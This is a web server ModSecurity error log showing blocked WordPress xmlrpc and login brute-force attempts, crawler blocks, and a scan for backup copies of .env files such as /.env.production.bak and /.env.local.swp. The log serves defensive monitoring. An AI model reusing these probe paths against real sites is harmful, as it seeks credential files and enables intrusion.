[Tue May 26 16:03:55.864715 2026] [security2:error] [pid 762634:tid 762816] [client 103.153.130.62:59029] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3E7x8rj1VZMqUAOeECAAAADQ"]
[Tue May 26 16:03:55.924084 2026] [security2:error] [pid 762634:tid 762850] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3E7x8rj1VZMqUAOeEAAAAAFY"]
[Tue May 26 16:03:56.017192 2026] [security2:error] [pid 762634:tid 762869] [client 62.60.130.233:50707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.kmmc.co.in"] [uri "/wp-login.php"] [unique_id "ahV3FLx8rj1VZMqUAOeEEAAAAGk"]
[Tue May 26 16:03:56.279224 2026] [security2:error] [pid 762634:tid 762882] [client 193.186.4.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV3E7x8rj1VZMqUAOeD7wAAAHY"], referer: https://www.google.com/
[Tue May 26 16:03:58.149233 2026] [security2:error] [pid 762634:tid 762816] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Fbx8rj1VZMqUAOeEOAAAADQ"]
[Tue May 26 16:03:58.243923 2026] [security2:error] [pid 762634:tid 762867] [client 103.44.52.196:53108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Frx8rj1VZMqUAOeERwAAAGc"]
[Tue May 26 16:03:58.244096 2026] [security2:error] [pid 762634:tid 762867] [client 103.44.52.196:53108] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Frx8rj1VZMqUAOeERwAAAGc"]
[Tue May 26 16:03:58.481016 2026] [autoindex:error] [pid 762634:tid 762776] [client 91.84.104.205:55468] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:04:00.225520 2026] [security2:error] [pid 762634:tid 762875] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3F7x8rj1VZMqUAOeEdwAAAG8"]
[Tue May 26 16:04:00.465535 2026] [security2:error] [pid 762634:tid 762777] [client 45.157.234.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3GLx8rj1VZMqUAOeEfgAAAA0"]
[Tue May 26 16:04:01.330366 2026] [security2:error] [pid 762634:tid 762846] [client 130.51.21.109:58266] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV3GLx8rj1VZMqUAOeEigAAAFI"], referer: https://anujtradingco.com
[Tue May 26 16:04:02.314996 2026] [security2:error] [pid 762634:tid 762784] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Gbx8rj1VZMqUAOeEpAAAABQ"]
[Tue May 26 16:04:03.995460 2026] [security2:error] [pid 762634:tid 762765] [client 207.241.173.85:48064] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.production.copy"] [unique_id "ahV3G7x8rj1VZMqUAOeE3wAAAAE"]
[Tue May 26 16:04:04.328963 2026] [security2:error] [pid 762634:tid 762812] [client 66.249.64.166:40503] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV3G7x8rj1VZMqUAOeExgAAADA"], referer: http://doyecpa.com/prizes/47856076%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 16:04:04.647010 2026] [security2:error] [pid 762634:tid 762878] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3HLx8rj1VZMqUAOeE5QAAAHI"]
[Tue May 26 16:04:04.663046 2026] [security2:error] [pid 762634:tid 762816] [client 106.219.85.83:22608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3HLx8rj1VZMqUAOeE8AAAADQ"]
[Tue May 26 16:04:04.663151 2026] [security2:error] [pid 762634:tid 762816] [client 106.219.85.83:22608] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3HLx8rj1VZMqUAOeE8AAAADQ"]
[Tue May 26 16:04:05.681209 2026] [security2:error] [pid 762634:tid 762864] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Hbx8rj1VZMqUAOeFAgAAAGQ"]
[Tue May 26 16:04:06.069699 2026] [security2:error] [pid 762634:tid 762876] [client 103.153.130.62:59284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Hrx8rj1VZMqUAOeFDwAAAHA"]
[Tue May 26 16:04:06.069821 2026] [security2:error] [pid 762634:tid 762876] [client 103.153.130.62:59284] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3Hrx8rj1VZMqUAOeFDwAAAHA"]
[Tue May 26 16:04:07.130115 2026] [security2:error] [pid 762634:tid 762854] [client 103.44.52.196:59714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3H7x8rj1VZMqUAOeFJwAAAFo"]
[Tue May 26 16:04:07.130246 2026] [security2:error] [pid 762634:tid 762854] [client 103.44.52.196:59714] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3H7x8rj1VZMqUAOeFJwAAAFo"]
[Tue May 26 16:04:07.944218 2026] [security2:error] [pid 762634:tid 762794] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3H7x8rj1VZMqUAOeFMwAAAB4"]
[Tue May 26 16:04:08.598597 2026] [security2:error] [pid 762634:tid 762827] [client 207.241.173.85:48110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.old"] [unique_id "ahV3ILx8rj1VZMqUAOeFTAAAAD8"]
[Tue May 26 16:04:08.598755 2026] [security2:error] [pid 762634:tid 762771] [client 207.241.173.85:48116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.bak"] [unique_id "ahV3ILx8rj1VZMqUAOeFSwAAAAc"]
[Tue May 26 16:04:08.900227 2026] [security2:error] [pid 762634:tid 762775] [client 207.241.173.85:48152] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env~"] [unique_id "ahV3ILx8rj1VZMqUAOeFVAAAAAs"]
[Tue May 26 16:04:08.900675 2026] [security2:error] [pid 762634:tid 762807] [client 207.241.173.85:48166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.swp"] [unique_id "ahV3ILx8rj1VZMqUAOeFVQAAACs"]
[Tue May 26 16:04:08.902114 2026] [security2:error] [pid 762634:tid 762880] [client 207.241.173.85:48084] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.backup"] [unique_id "ahV3ILx8rj1VZMqUAOeFVgAAAHQ"]
[Tue May 26 16:04:08.992228 2026] [security2:error] [pid 762634:tid 762839] [client 207.241.173.85:48174] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.orig"] [unique_id "ahV3ILx8rj1VZMqUAOeFWQAAAEs"]
[Tue May 26 16:04:08.992288 2026] [security2:error] [pid 762634:tid 762816] [client 207.241.173.85:48218] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.local.bak"] [unique_id "ahV3ILx8rj1VZMqUAOeFXAAAADQ"]
[Tue May 26 16:04:08.992377 2026] [security2:error] [pid 762634:tid 762830] [client 207.241.173.85:48250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.local.orig"] [unique_id "ahV3ILx8rj1VZMqUAOeFWgAAAEI"]
[Tue May 26 16:04:08.993383 2026] [security2:error] [pid 762634:tid 762868] [client 207.241.173.85:48150] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.production.bak"] [unique_id "ahV3ILx8rj1VZMqUAOeFXgAAAGg"]
[Tue May 26 16:04:08.993661 2026] [security2:error] [pid 762634:tid 762867] [client 207.241.173.85:48266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.production.orig"] [unique_id "ahV3ILx8rj1VZMqUAOeFYQAAAGc"]
[Tue May 26 16:04:08.993661 2026] [security2:error] [pid 762634:tid 762765] [client 207.241.173.85:48178] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.production.old"] [unique_id "ahV3ILx8rj1VZMqUAOeFXwAAAAE"]
[Tue May 26 16:04:08.993749 2026] [security2:error] [pid 762634:tid 762849] [client 207.241.173.85:48254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.production.swp"] [unique_id "ahV3ILx8rj1VZMqUAOeFYgAAAFU"]
[Tue May 26 16:04:08.993922 2026] [security2:error] [pid 762634:tid 762860] [client 207.241.173.85:48116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.local~"] [unique_id "ahV3ILx8rj1VZMqUAOeFZAAAAGA"]
[Tue May 26 16:04:08.994143 2026] [security2:error] [pid 762634:tid 762781] [client 207.241.173.85:48228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.production~"] [unique_id "ahV3ILx8rj1VZMqUAOeFYwAAABE"]
[Tue May 26 16:04:08.994191 2026] [security2:error] [pid 762634:tid 762873] [client 207.241.173.85:48068] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.local.copy"] [unique_id "ahV3ILx8rj1VZMqUAOeFZwAAAG0"]
[Tue May 26 16:04:08.994451 2026] [security2:error] [pid 762634:tid 762881] [client 207.241.173.85:48096] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.local.swp"] [unique_id "ahV3ILx8rj1VZMqUAOeFZQAAAHU"]
[Tue May 26 16:04:08.994550 2026] [security2:error] [pid 762634:tid 762784] [client 207.241.173.85:48110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.local.backup"] [unique_id "ahV3ILx8rj1VZMqUAOeFXQAAABQ"]
[Tue May 26 16:04:08.994779 2026] [security2:error] [pid 762634:tid 762863] [client 207.241.173.85:48146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.copy"] [unique_id "ahV3ILx8rj1VZMqUAOeFZgAAAGM"]
[Tue May 26 16:04:08.995694 2026] [security2:error] [pid 762634:tid 762844] [client 207.241.173.85:48272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.production.backup"] [unique_id "ahV3ILx8rj1VZMqUAOeFWwAAAFA"]
[Tue May 26 16:04:09.081510 2026] [security2:error] [pid 762634:tid 762840] [client 207.241.173.85:48320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "shankhanaad.com.md-74.webhostbox.net"] [uri "/.env.local.old"] [unique_id "ahV3Ibx8rj1VZMqUAOeFaAAAAEw"]
[Tue May 26 16:04:10.586620 2026] [security2:error] [pid 762634:tid 762807] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Irx8rj1VZMqUAOeFiAAAACs"]
[Tue May 26 16:04:11.189257 2026] [security2:error] [pid 762634:tid 762727] [remote 95.216.117.13:59350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahV3I7x8rj1VZMqUAOeFmwAATFw"]
[Tue May 26 16:04:12.395028 2026] [security2:error] [pid 762634:tid 762636] [remote 51.91.98.45:50292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV3JLx8rj1VZMqUAOeFvQAAbAE"]
[Tue May 26 16:04:12.457550 2026] [security2:error] [pid 762634:tid 762789] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3JLx8rj1VZMqUAOeFtAAAABk"]
[Tue May 26 16:04:14.360451 2026] [security2:error] [pid 762634:tid 762805] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3Jbx8rj1VZMqUAOeF6gAAACk"]
[Tue May 26 16:04:15.269100 2026] [security2:error] [pid 762634:tid 762816] [client 106.219.85.83:11855] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3J7x8rj1VZMqUAOeGCgAAADQ"]
[Tue May 26 16:04:15.269210 2026] [security2:error] [pid 762634:tid 762816] [client 106.219.85.83:11855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3J7x8rj1VZMqUAOeGCgAAADQ"]
[Tue May 26 16:04:16.383679 2026] [security2:error] [pid 762634:tid 762889] [client 103.44.52.196:38290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3KLx8rj1VZMqUAOeGJAAAAH0"]
[Tue May 26 16:04:16.383838 2026] [security2:error] [pid 762634:tid 762889] [client 103.44.52.196:38290] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3KLx8rj1VZMqUAOeGJAAAAH0"]
[Tue May 26 16:04:16.428351 2026] [security2:error] [pid 762634:tid 762786] [client 103.153.130.62:52098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3KLx8rj1VZMqUAOeGJQAAABY"]
[Tue May 26 16:04:16.428497 2026] [security2:error] [pid 762634:tid 762786] [client 103.153.130.62:52098] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV3KLx8rj1VZMqUAOeGJQAAABY"]
[Tue May 26 16:04:16.967147 2026] [security2:error] [pid 762634:tid 762866] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3KLx8rj1VZMqUAOeGKQAAAGY"]
[Tue May 26 16:04:17.303706 2026] [security2:error] [pid 762634:tid 762785] [client 185.191.171.16:39108] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahV3Kbx8rj1VZMqUAOeGOwAAABU"]
[Tue May 26 16:04:17.303841 2026] [security2:error] [pid 762634:tid 762785] [client 185.191.171.16:39108] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahV3Kbx8rj1VZMqUAOeGOwAAABU"]
